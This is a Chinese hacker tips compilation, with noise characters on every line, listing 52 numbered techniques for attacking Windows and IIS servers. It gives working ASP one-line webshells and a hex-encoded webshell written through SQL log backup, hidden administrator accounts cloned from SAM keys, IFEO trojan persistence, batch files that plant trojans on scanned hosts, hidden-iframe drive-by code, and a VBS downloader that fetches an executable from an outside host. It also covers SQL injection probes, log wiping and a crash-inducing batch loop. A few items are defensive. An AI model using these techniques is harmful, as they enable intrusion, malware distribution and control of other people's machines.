1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,. F( z- ?: G& ?) z p# K R
cacls C:\windows\system32 /G hqw20:R
5 C4 x8 a+ v. l思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
$ q, b$ y+ I& H2 y恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
0 G; y) h9 i0 E" p) R. c; P x1 K$ ~& o6 R/ ]7 B! Y' l4 w
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。. ^$ u+ u0 w" b5 _8 j7 T4 G
% N) l. X: M1 D1 ]! j C, \
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
1 n+ `3 X E. g8 e6 A/ g6 Q0 F# c$ Y4 U# o
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
. m4 R. H( H4 \, g
, b+ W$ E, n: T% v: y5、利用INF文件来修改注册表9 Z# W- B0 F: |+ L" q: _; k) l, t
[Version]
G4 ?: l7 [( I4 C) l- A" ZSignature="$CHICAGO$"
9 V9 v2 n! e1 Y9 _7 o, t[Defaultinstall]
+ \- ?, r" e$ kaddREG=Ating1 U0 O; a8 P2 R( p
[Ating]
0 U2 L) z0 ~8 D; X) A+ MHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
v( _- {& g3 `' t; Z以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:' }: e) \7 h8 P8 ?4 E. E
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径9 z* J& f: {, c, B5 l
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
! g& Y2 F' O3 k; L8 _; JHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
9 F5 v: F3 ?9 z. `HKEY_CURRENT_CONFIG 简写为 HKCC
0 g) c1 {) I M' D. G' D0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值# E$ D* i5 z) `/ q
"1"这里代表是写入或删除注册表键值中的具体数据7 l. W8 h H5 c$ q" P. T- [ c
+ ~9 j0 G! \0 R0 |0 z! z2 B
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,' q: f+ ~( T6 h9 G$ x! G, P2 V
多了一步就是在防火墙里添加个端口,然后导出其键值7 n7 `) F- c/ s
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]5 u' h2 N4 A i
" X: ~& K4 y, ?# T. n6 n" G! R5 [
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
0 D( l9 b _$ k/ S* P9 e, H n: u在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
& _( s1 @/ C5 k2 A0 `0 r
* |- h9 y; t& D! e8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
, T7 b) i2 U2 w) b6 ~4 D* w3 [0 B( [2 E& d
8 r- n$ Y5 B9 ]9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,4 j- D" l7 i9 D0 d$ G
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。 ]9 Q5 m! ~" Z
8 P3 X! Q/ \7 B$ e6 A9 D
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
' t; R! P" ~! g, |3 B8 a
, X! X' \' J3 c- H/ a. Q11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,: j3 j+ G4 G* P3 w5 M* N. d2 t
用法:xsniff –pass –hide –log pass.txt
6 d: ~" x. [ m m' ]$ ~1 b) z* e7 C9 g* \; D& `2 Q1 M) c% C& g
12、google搜索的艺术4 ?2 C( y3 ?& C) F+ B& f$ M
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
& J: n$ W3 l2 c4 V" k或“字符串的语法错误”可以找到很多sql注入漏洞。
$ K$ i. ` O2 t2 e+ o
% z8 C3 A4 p6 t( L7 }( ~13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。/ E$ o/ J$ T, G: u
; Z: E7 Z! L4 b% L1 K* V- P: C) b14、cmd中输入 nc –vv –l –p 1987
# g) q/ a- ^9 c" }" v做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
$ o+ [/ h p2 E9 P7 h
; h: h0 p( ?! E6 V15、制作T++木马,先写个ating.hta文件,内容为3 I! b0 v1 L7 { e1 j) S
<script language="VBScript">
/ b4 m; a/ e. z* N' h h+ qset wshshell=createobject ("wscript.shell" )
1 n8 p y1 y4 H! X3 ra=wshshell.run("你马的名称",1)7 j- ^! P$ h1 h( {& N% B
window.close
$ S7 C: `$ e G2 T F</script>
) [" l5 u) u8 ]0 k8 p再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
0 p, [7 E& O( C! i3 L. q( B# p) f7 l& Q: _0 ~; ^+ Y, ?' [' V8 P
16、搜索栏里输入0 ?8 I/ I6 \) z& y+ X8 x
关键字%'and 1=1 and '%'='
* s% J; c$ C5 X, \% }; E; m1 U关键字%'and 1=2 and '%'='
, p7 P* B& l: p! v9 Q比较不同处 可以作为注入的特征字符2 O/ F6 K! D! z+ N, o+ ?
% r. W1 P) B& q6 c: B4 b5 }- R+ z17、挂马代码<html>
# l$ L% N, j1 L5 g2 D8 V3 u+ n<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
& L/ d, M% R& ]2 e' d1 V6 Q</html>0 W: i5 s6 x3 l. t& T# J+ y
( {$ N$ r: R, ^6 w9 Y. e, t3 Q" T
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,+ @7 O$ E# m. r) U! U
net localgroup administrators还是可以看出Guest是管理员来。
' ~4 e4 o) r9 G
8 \2 L4 x$ A; F# i19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等1 X2 L3 Q7 d2 i
用法: 安装: instsrv.exe 服务名称 路径7 Z! j9 }2 x8 H4 C2 t. \4 s
卸载: instsrv.exe 服务名称 REMOVE
; ^3 O F2 j6 M: e& T" b" j% G# T D6 x2 A) m0 l4 G. E( `
2 I7 d/ P% `, j
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
8 B* w7 [# `' Z+ t5 F3 p, X3 }不能注入时要第一时间想到%5c暴库。- E, Q( a; b+ w' i+ G) s
) T' V2 u9 ]* s+ H22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~) u' j' z) N- @: O5 F5 Y. u9 f
3 v8 P$ n8 \% y) m23、缺少xp_cmdshell时 `* \2 |- Y- `8 {+ s: O
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
! n: x8 f8 v3 v0 k假如恢复不成功,可以尝试直接加用户(针对开3389的)
( F6 G6 m- T3 N, J8 I T% Mdeclare @o int
+ \! U" I9 ?# k' l. {7 [exec sp_oacreate 'wscript.shell',@o out
8 i+ v0 g" R U! {' I3 xexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员, {) t2 `' S+ E; A1 }4 Y
% Z- m! ~# O, r. A7 Q2 Y/ `9 o
24.批量种植木马.bat
& Y2 G* e. r. B$ ?( U& j* G1 ufor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中( E& ~, ~% ^. P7 e) l: Z0 _
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间2 G9 k: q7 c0 j$ d
扫描地址.txt里每个主机名一行 用\\开头7 Y6 C' {% v/ Y2 g
; F7 X( ~' q7 r) J( X
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
C. W. A3 r. h# L* n _% G* y1 y* S! |$ i
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名./ [# R- `8 f& g( ?
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
L# C& j+ I- \0 K$ H.cer 等后缀的文件夹下都可以运行任何后缀的asp木马! z7 E8 [3 U0 f, S
& {7 r! {, h v- L
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP4 `1 h5 I" H$ g; G$ Q
然后用#clear logg和#clear line vty *删除日志& x, |+ T1 d( ^8 Q, j
" h+ b* K7 Q$ K3 A1 I# g* C7 Q3 ]
28、电脑坏了省去重新安装系统的方法
% ^+ G a' O% q8 p纯dos下执行,
, A% \: \2 G, W4 F: F6 i" Jxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
1 r- @, q; @4 \% P- O: [* A2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
% Y: M9 S0 _, J
- y; X. V5 w1 Y% J* R# h) ?29、解决TCP/IP筛选 在注册表里有三处,分别是:$ A6 D5 N! u6 F# N9 @
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
; P2 y8 D* g: ~HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip: l% J9 |" i5 ]. }1 U
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
8 l! Q7 k6 i* d1 ^! q k& J5 v分别用
1 J# @& }3 W* {% G$ e* Jregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# h8 w, W3 E+ N7 A) Q" Lregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( R! r2 L v, x* k. Lregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 |) y8 V8 q. a4 R. W命令来导出注册表项6 K3 V; M) N# p& K, ]% A5 a1 k
然后把三个文件里的EnableSecurityFilters"=dword:00000001,2 ^0 I1 q" _. J& P
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
. E3 n4 L. l' }9 J% Pregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
1 E1 H' V Y6 [) T$ ]' I9 I9 T5 e) A6 \7 T
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
/ _5 M& K& e4 O. e* RSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3! \% \' _0 \9 ~( }8 J1 e$ M
! k$ ], I1 y8 D6 @ o/ }& A. s9 k
31、全手工打造开3389工具' d% F) q7 U( O3 N3 D9 @* d( d
打开记事本,编辑内容如下:( l% I' U9 o, }% ?) K
echo [Components] > c:\sql
3 f0 f: K7 v+ \- ?/ zecho TSEnable = on >> c:\sql
y6 y) N' T1 ]$ O. ^0 Ssysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
; c) J/ I% l. n% Y/ r7 b# m编辑好后存为BAT文件,上传至肉鸡,执行
6 l$ O8 N8 F- t! z3 B5 l0 o( n! }% A9 _
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
: z1 P' [ V2 P) }/ u9 H h2 J4 E2 x* o
33、让服务器重启
: l1 `7 W6 J: |8 W: H- F$ |( L- Z q写个bat死循环:/ }7 d/ l) B& d D2 o2 z
@echo off7 T) l; Q2 p. l3 v9 l3 D2 T- y
:loop1' J* y) t; K4 Q. I( b
cls
4 F7 _+ g5 _* T2 R* ?( d. o; sstart cmd.exe
' {7 u9 x" k3 Q& hgoto loop1
* b! k6 [$ w# x4 l! Q$ Q9 C保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
& J& c% j. j6 b
$ r W* S4 A+ d' @3 }34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
( V9 c2 a( S) u) z@echo off+ a; a" C) ]; h- R% y1 ~
date /t >c:/3389.txt
! Z' e( a0 w& B/ N0 w3 K1 B3 wtime /t >>c:/3389.txt7 N D7 Y1 `& H! g0 i( {
attrib +s +h c:/3389.bat7 z$ z' S L, Q, Y& D$ r S9 ]0 T
attrib +s +h c:/3389.txt. ^1 ?! u2 k: l% U
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt8 U. b) K$ f/ s
并保存为3389.bat
6 O" I( [# x5 t& I8 i打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
! n& N4 j0 V9 p7 l ^+ G* ^4 I8 [. C' f! h# L7 j2 R, [8 M
35、有时候提不了权限的话,试试这个命令,在命令行里输入:: Z% s6 E3 j F5 X* [! y9 i& T
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
9 k9 Q7 C; g3 c! C输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。 L, a* O4 K6 n5 [& V/ A- A! ^0 B
8 R) y% z$ K9 K) P
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件. a) T4 c% k4 }# m2 N4 ]
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址' u$ v8 X* `) l) m3 I
echo 你的FTP账号 >>c:\1.bat //输入账号- x* A J: c8 R; H% B" k' l# i7 {) [
echo 你的FTP密码 >>c:\1.bat //输入密码
' C) Z2 l7 w5 ^! L4 } Jecho bin >>c:\1.bat //登入
' s g. c+ b0 Becho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么4 a( f2 }# ^+ h8 x0 { J; K: G l
echo bye >>c:\1.bat //退出( i/ C, L, D- w: _5 v
然后执行ftp -s:c:\1.bat即可/ S' F K3 q% x7 B( m7 t& J
. E* k& f8 Q& t- {- G: S' C& u
37、修改注册表开3389两法
, E0 B# ^2 d5 C* s& N& O3 T(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
5 ]- v2 a4 x7 `# k/ Zecho Windows Registry Editor Version 5.00 >>3389.reg: s; ?; P7 D, X+ b
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg3 Q. k" Q# s8 m& F' y8 P
echo "Enabled"="0" >>3389.reg u4 M/ G% c9 y- x( S3 { p7 F% H
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
( R$ s8 d# q: c4 t5 D" E2 N( pNT\CurrentVersion\Winlogon] >>3389.reg
/ d: c$ |+ x4 h z$ B6 n% }6 Cecho "ShutdownWithoutLogon"="0" >>3389.reg0 `/ }2 t5 t; w( o& j
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]! U: Z& `5 X4 V
>>3389.reg: s* D& ~5 h* ?& b8 f8 r
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
( i) w/ G" L7 U/ d( g5 [2 z4 L1 necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]$ K3 R/ ^. Y0 \1 M* A
>>3389.reg2 g$ w7 \: u9 Y+ w
echo "TSEnabled"=dword:00000001 >>3389.reg
8 h! k, m7 P& G4 Q% d* E, hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg/ g$ c6 n4 _5 b ~& P% j& f
echo "Start"=dword:00000002 >>3389.reg5 U( r) p2 ^/ x) e# { C; l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] O. L# R6 k1 H
>>3389.reg
; Y8 Q8 O6 W! k" ^# B# iecho "Start"=dword:00000002 >>3389.reg
: o5 H) x3 q4 o' |& Necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg' |4 G. J- ^: ~ n/ L
echo "Hotkey"="1" >>3389.reg
* r) h2 I' M% L, \& cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, i. R3 P& k+ U% Q5 C$ xServer\Wds\rdpwd\Tds\tcp] >>3389.reg
/ l+ I: C2 e2 ~: o X$ s$ Necho "PortNumber"=dword:00000D3D >>3389.reg$ D- G. T% Y1 }/ Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" D$ J2 ]7 C/ a7 C) FServer\WinStations\RDP-Tcp] >>3389.reg
7 Y5 w( ^& {7 m }7 }- u4 vecho "PortNumber"=dword:00000D3D >>3389.reg
0 O. e$ B! c2 L5 p把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。. [% u) ]4 ]3 b% A# ^' `
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了): C& f5 t7 a# f) h& u4 |3 U) b
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
/ @1 ` K0 B. M" N0 }# l3 L(2)winxp和win2003终端开启
& `4 n1 }. ~9 R8 s! n用以下ECHO代码写一个REG文件:
) w" \# m- x. ^( G3 |: T( o; jecho Windows Registry Editor Version 5.00>>3389.reg$ X u4 H' ^8 y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. a% t+ y; Z+ e
Server]>>3389.reg
- w: B8 i: r7 X7 ^" t% I1 H' recho "fDenyTSConnections"=dword:00000000>>3389.reg/ `# j& W! A# }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% Q9 g' S) Y4 O& w6 }, [1 ]6 G9 Q+ V: x
Server\Wds\rdpwd\Tds\tcp]>>3389.reg3 G0 v8 @, h8 f$ A
echo "PortNumber"=dword:00000d3d>>3389.reg
1 v/ g) A$ p' Z7 @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& Z& x2 s- l* X4 e, sServer\WinStations\RDP-Tcp]>>3389.reg! [% b/ ~' k* j. d" C
echo "PortNumber"=dword:00000d3d>>3389.reg) e F2 |; J6 X5 s
然后regedit /s 3389.reg del 3389.reg
4 h& D8 @# ?& B( `# MXP下不论开终端还是改终端端口都不需重启
7 W( k' ?5 z" S
% a9 ^. t L" R% R Z38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃2 ~$ e; |* Z- g3 Z9 \1 ?! O7 p
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'/ P9 [( t9 n4 W0 x
) ^ t4 Z/ |# D& E6 P7 d& b
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
2 e/ w }: t3 c1 G2 F! A3 }(1)数据库文件名应复杂并要有特殊字符( T( l6 e& z7 o7 d% e# ]! E+ k6 W
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源; r8 P2 z2 J3 y/ z9 V
将conn.asp文档中的. A0 x& {- u; I' C! l
DBPath = Server.MapPath("数据库.mdb")9 [ W- d( l: k( `. b
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath8 j7 U0 F& B9 i) B
* ~1 u2 Q# O. y2 \; W修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置8 N9 O; F. J; N( X
(3)不放在WEB目录里# w: J$ I- T4 R5 N( G0 B1 M' g# u% F
( E% h3 z( g w
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉8 X! @& B1 u5 V3 N, x
可以写两个bat文件& p/ F d: T( z/ Z/ p3 ~9 m
@echo off9 k" g) o1 @% x7 F2 T. s" l
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
$ B! F5 v1 S1 z" f+ W% ~9 e' T4 L@del c:\winnt\system32\query.exe! Z9 l8 @ ?. c( V, j' l( G, x) O
@del %SYSTEMROOT%\system32\dllcache\query.exe6 Y p) r* |+ O$ s; f3 b8 J7 H* `7 l6 B
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
; Q, v9 e5 t2 b% [1 z4 @8 F/ `$ B; r. L8 x0 R, H$ Y8 y7 _
@echo off
3 H2 U( _8 \3 }0 [ h@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe# K" Y* f$ m$ x2 f9 X8 c+ g
@del c:\winnt\system32\tsadmin.exe
% Q" [& `% S# Z@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex1 _; m* V9 V( y2 `1 ?3 |2 E6 L. f
4 _& u' f0 [' Y" B, O9 H
41、映射对方盘符
' _& u/ E _; m$ Ttelnet到他的机器上,+ i' R( j5 n8 ?5 {1 J6 K' V9 K# s
net share 查看有没有默认共享 如果没有,那么就接着运行
9 L2 x3 l( R* b3 Q( V2 Y) c* qnet share c$=c:7 T. e( @/ {- ^3 _1 F& w
net share现在有c$) |2 r9 c% h$ Q- p' s
在自己的机器上运行
( ]' V2 N. I3 a0 rnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K* @8 n3 x) q5 J I% W, O+ F) w
. }2 p1 N* X7 D5 e42、一些很有用的老知识
0 @/ q! i* [" ptype c:\boot.ini ( 查看系统版本 )
. u( ^$ X; U* }/ n; @% xnet start (查看已经启动的服务)
$ j1 i6 n0 K) F: _, {query user ( 查看当前终端连接 )6 q( E" u# F M/ v Q. z
net user ( 查看当前用户 )
2 ~3 Z1 k2 a( {, j, fnet user 用户 密码/add ( 建立账号 )! U# P9 B$ r' E6 \* ?
net localgroup administrators 用户 /add (提升某用户为管理员)) X, n, A; _! O' k
ipconfig -all ( 查看IP什么的 )9 g2 E% M+ T, O7 O' t; e( R: o. w
netstat -an ( 查看当前网络状态 )8 _0 w! @0 A2 t7 n/ L) b% p* ~
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
" o3 {8 q% s, J0 r6 {6 e克隆时Administrator对应1F4
; D2 `3 u) }" o6 w- U+ _guest对应1F5
% p1 a T( y! }* |tsinternetuser对应3E8
% }# _: }% C- K) N/ B( e7 i
3 ^! s4 t6 F) J6 ]5 U# `4 l43、如果对方没开3389,但是装了Remote Administrator Service6 A( G: ~6 ?) D6 v# v
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接, ^6 }- g7 j# v- {
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
+ o9 f# r' P3 D2 L先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
. z9 D8 c: `0 |& u, }( s
7 O' W) s8 H5 r& @44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
9 y9 r9 }* D% p8 r本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
3 E7 S5 U* e) L$ B+ w
1 Y* f4 H7 k. f1 H3 I8 o45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
3 C$ j! z9 F% [, Y9 Z3 j( Zecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
, b2 D9 f) F' h^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =5 o. m3 k0 c0 W' C/ L3 d# u3 @& j
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
% T) s$ P0 n, _5 r- S4 P' L& h* g1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
0 r8 z& `4 H& N(这是完整的一句话,其中没有换行符)
% I' U/ b: l( O8 w9 Z然后下载:
9 a- O3 v1 v$ y2 x; \cscript down.vbs http://www.hack520.org/hack.exe hack.exe, `8 M$ a$ m# a. W% W6 {
1 |# g6 \; D/ D+ D9 v: ?
46、一句话木马成功依赖于两个条件:
( ?8 B+ j. K) O; m6 r- `1、服务端没有禁止adodb.Stream或FSO组件
0 B% g( T0 J, k& D" @) a2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
. S4 ?- J) w3 n0 C3 S- u
. `7 E3 c; b8 p% z, N47、利用DB_OWNER权限进行手工备份一句话木马的代码:9 x5 N- u8 k6 T
;alter database utsz set RECOVERY FULL--
* f9 t) V! ~7 a4 C. f;create table cmd (a image)--5 ^* M9 x# w3 P
;backup log utsz to disk = 'D:\cmd' with init--
: C7 r0 x6 Z( R9 e. X4 d t;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
: x& q# i+ Z" |$ w;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
: H$ w" z$ Q1 Y+ S. L p, [注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。 @; U; i8 R" [2 e% [% F- \
/ Y1 Q) K/ a( ~
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:" m7 R" \4 @" }1 `
; {. D! O# H( |) |0 n' U- [+ C; Q
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options; G- F5 q& z2 W" a4 W
所有会话用 'all'。
1 o4 a) X4 C* _-s sessionid 列出会话的信息。
- A ?, Z' Z6 z$ t: w2 X1 }) K4 Q-k sessionid 终止会话。$ w0 P5 g; [9 G0 \! D# M. [
-m sessionid 发送消息到会话。& O- }) b Z- `% m! o& ?, n, e7 p8 Z
% W) \. x* i- O2 a+ A! yconfig 配置 telnet 服务器参数。
6 I+ C- N9 Z k2 E
$ u+ e5 |9 `" [" u: Ccommon_options 为:$ h* U, I/ _8 }# b5 L/ I8 U9 }+ S
-u user 指定要使用其凭据的用户) {4 Z. K4 E$ u F1 r7 C5 D- s& E+ X
-p password 用户密码
7 U1 H- J j% _, s
: L6 j* p. b0 [9 x3 Uconfig_options 为:
: w. H# C- O- c, W7 X. ydom = domain 设定用户的默认域+ a" M8 g0 |9 K
ctrlakeymap = yes|no 设定 ALT 键的映射
8 @4 Q- r8 _( z9 M4 s) ftimeout = hh:mm:ss 设定空闲会话超时值( ~0 p: a' W- M9 j
timeoutactive = yes|no 启用空闲会话。
7 \ x, U: X8 R- s5 V+ C! ^maxfail = attempts 设定断开前失败的登录企图数。
& g" J' M B1 ]0 Omaxconn = connections 设定最大连接数。/ `1 p- Q( O6 N }9 D$ A, d% ]) Z) |
port = number 设定 telnet 端口。1 D) y' w/ h1 u% F; s
sec = [+/-]NTLM [+/-]passwd
, X* H5 }1 h% E! {; S$ R. X设定身份验证机构5 R8 x& `0 R2 B
fname = file 指定审计文件名。
. u# v4 T7 w7 _. j; ?fsize = size 指定审计文件的最大尺寸(MB)。
3 U4 ?2 G2 `7 M8 o( o* emode = console|stream 指定操作模式。8 e; I [7 Q4 X
auditlocation = eventlog|file|both
8 h# V5 z6 N/ y& L, Y6 i5 R, k指定记录地点 z+ t" y9 E2 ?; O
audit = [+/-]user [+/-]fail [+/-]admin
. ^- C% s8 Q: p( g$ P. K0 ]! G
7 f) Z0 e6 t+ I4 I( [8 x49、例如:在IE上访问:
! C& h; \9 ]9 n+ }( u8 Dwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
8 _5 U4 _# f$ S' i' j5 Fhack.txt里面的代码是:
% A q. b! A8 l4 h% J<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">" e7 ~& S3 A0 ?
把这个hack.txt发到你空间就可以了!& ?. r9 b1 J6 ?- p3 u6 p
这个可以利用来做网马哦!
& v+ d! L& O) V. H' j3 `& ~( l, Q: Z. j; s
50、autorun的病毒可以通过手动限制!# {; U! B% I5 S6 V2 a9 i9 K9 u0 ^
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
$ e) x, L* P. y- G' b2,打开盘符用右键打开!切忌双击盘符~& w' ?. i" n' _9 z/ X; F
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!' j \# l/ P( Z( Z' T
2 x4 N3 X& ?, D1 a( F( w
51、log备份时的一句话木马:% L% p4 O- i }5 m3 X
a).<%%25Execute(request("go"))%%25>* ]8 [& e) u; v3 {) x* g7 l4 C
b).<%Execute(request("go"))%>/ o1 n& X1 y* C
c).%><%execute request("go")%><%
/ t$ L3 d7 C4 Q0 X) F! Z9 Gd).<script language=VBScript runat=server>execute request("sb")</Script>4 G q* \, {: p3 t7 \
e).<%25Execute(request("l"))%25>
/ h' V% H# N" \& }f).<%if request("cmd")<>"" then execute request("pass")%>( z2 Q" T9 L; R' B }5 O- j: V
1 [( s A5 y# \9 E1 D
52、at "12:17" /interactive cmd
